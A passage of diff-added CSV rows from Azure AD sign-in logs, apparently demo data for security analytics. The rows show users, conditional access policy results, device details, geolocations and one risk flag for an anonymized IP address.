'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",54b59d3d-5e95-40b7-b10b-432425e50b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,54b59d3d-5e95-40b7-b10b-432425e50b00,SigninLogs,Sucess,50.6406517,5.572050095
+248,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:02.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,328de089-b169-451d-b991-b5071fef8050,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c883e3df-3efa-4676-93e1-2d97526c1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c883e3df-3efa-4676-93e1-2d97526c1600,SigninLogs,Sucess,50.6406517,5.572050095
+249,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97dae959-f3b0-40e2-b758-8548030b3c7d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3108dc47-edad-48bc-88bb-75ce35c61500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3108dc47-edad-48bc-88bb-75ce35c61500,SigninLogs,Sucess,33.7984581,-84.38828278
+250,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:41.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fd7a6355-56f5-4bc2-9ad4-c259bcf20500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,fd7a6355-56f5-4bc2-9ad4-c259bcf20500,SigninLogs,Sucess,34.06555176,-118.2405396
+251,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:19.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c7c6f52b-c28a-4626-8521-7d0f254e23cd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",793d74e7-0f32-47f0-ad00-3e8cb0180800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,793d74e7-0f32-47f0-ad00-3e8cb0180800,SigninLogs,Sucess,13,105
+252,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,beaf469f-6020-0000-4704-a9f2ecbfbb3c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f190e8f0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,92c2001d-49e6-496a-951e-7f190e8f0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+253,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3bc55895-27c0-4069-b73c-dfe9123f9a3a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f6f5040900,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d09c2317-414d-4072-ab4f-d2f6f5040900,SigninLogs,Sucess,-20.54751015,-47.4056282
+254,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:49.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,afdcfd6d-1cfb-46d9-ac57-6b8b2d69299a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4aca3199-2681-43b9-9160-589c2c8c0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,4aca3199-2681-43b9-9160-589c2c8c0d00,SigninLogs,Sucess,50.6406517,5.572050095
+255,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,27cdd1bc-88d2-4336-81bc-12b84fdaca79,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': 